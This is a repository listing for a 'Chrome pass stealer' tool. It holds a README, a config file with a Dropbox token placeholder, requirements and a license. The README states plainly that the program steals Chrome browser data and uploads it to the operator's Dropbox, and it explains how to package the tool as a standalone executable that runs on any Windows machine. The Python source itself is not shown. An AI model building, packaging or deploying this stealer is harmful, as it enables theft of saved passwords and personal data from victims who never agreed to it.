├── .gitignore ├── requirements.txt ├── config.json ├── LICENSE ├── README.md └── chromepass.py /.gitignore: -------------------------------------------------------------------------------- 1 | **/__pycache__/** 2 | *.exe 3 | *.spec -------------------------------------------------------------------------------- /requirements.txt: -------------------------------------------------------------------------------- 1 | dropbox shutil pyinstaller 2 | -------------------------------------------------------------------------------- /config.json: -------------------------------------------------------------------------------- 1 | { 2 | "dropbox_token": "enter your token here" 3 | } -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2020 SaiTeja69 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Chrome_pass_stealer 2 | A python application to steal chrome data and push it back to you 3 | Finds the data , pushes it back to you. 4 | 5 | 6 | An Improvised Version of [Shaskank Chandak's Password Stealer](https://github.com/shashankchandak/PasswordStealer). What's improved you may ask? That version doesn't work! 7 | 8 | ### Before you begin 9 | - Get an DropBox API key from [Here](https://blogs.dropbox.com/developers/2014/05/generate-an-access-token-for-your-own-account/) 10 | - After you get the key add it in `config.json` 11 | 12 | #### How to create an exe file ? 13 | 14 | - Make the edits in your .py file (add your api key etc) 15 | 16 | - Now install pyinstaller 17 | ```sh 18 | $ pip install pyinstaller 19 | ``` 20 | - Build the package by executing following command 21 | 22 | ```sh 23 | pyinstaller --onefile chromepass.py 24 | ``` 25 | NOTE: After you build the executable, It will work on any machine even if that machine doesn't have python installed. 26 | 27 |